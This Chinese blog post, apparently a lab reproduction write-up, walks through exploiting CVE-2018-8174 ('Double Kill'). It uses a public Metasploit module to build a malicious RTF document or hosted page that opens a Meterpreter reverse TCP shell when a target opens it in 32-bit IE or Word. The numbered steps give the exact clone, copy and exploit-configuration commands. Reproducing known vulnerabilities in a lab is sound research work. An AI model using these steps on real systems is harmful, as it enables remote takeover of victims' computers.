layout: post
    cid: 32
    title: CVE-2018-8174双杀漏洞复现
    slug: 32
    date: ‘2018/06/11 18:17:00’
    updated: ‘2018/06/28 10:17:48’
    status: publish
    author: 夜莺
    categories:

    近日,360安全中心在全球范围内率先监测到一例使用0day漏洞的APT攻击,经分析发现,该攻击是全球首个使用浏览器0day漏洞的新型Office文档攻击。只要打开恶意文档就可能中招,被黑客植入后门木马甚至完全控制电脑。
    黑客是通过投递内嵌恶意网页的Office文档的形式实施此次APT攻击,中招者打开文档后,所有的漏洞利用代码和恶意荷载都通过远程的服务器加载。攻击的后期利用阶段使用了公开的UAC绕过技术,并利用了文件隐写技术和内存反射加载的方式来避免流量监测和实现无文件落地加载。
    复现过程:
    环境:Parrot虚拟机、Metasploit模块
    1、Github上获得漏洞模块

    1. git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

    CVE-2018-8174双杀漏洞复现 - 图1
    2、将刚刚下载的模块中的CVE-2018-8174.rb复制到fileformat目录

    1. cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

    ![图2][2]
    将CVE-2018-8174.rtf复制到exploits目录

    1. cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

    ![图3][3]
    3、启动我们的metasploit

    1. use exploit/windows/fileformat/CVE-2018-8174
    2. set PAYLOAD windows/meterpreter/reverse_tcp
    3. set srvhost 192.168.0.116
    4. set lhost 192.168.0.116
    5. exploit

    CVE-2018-8174双杀漏洞复现 - 图2
    后面打开192.168.44.44:8080,
    或者复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开
    注意:一定得IE32位,word仅支持Mircrosoft Office32位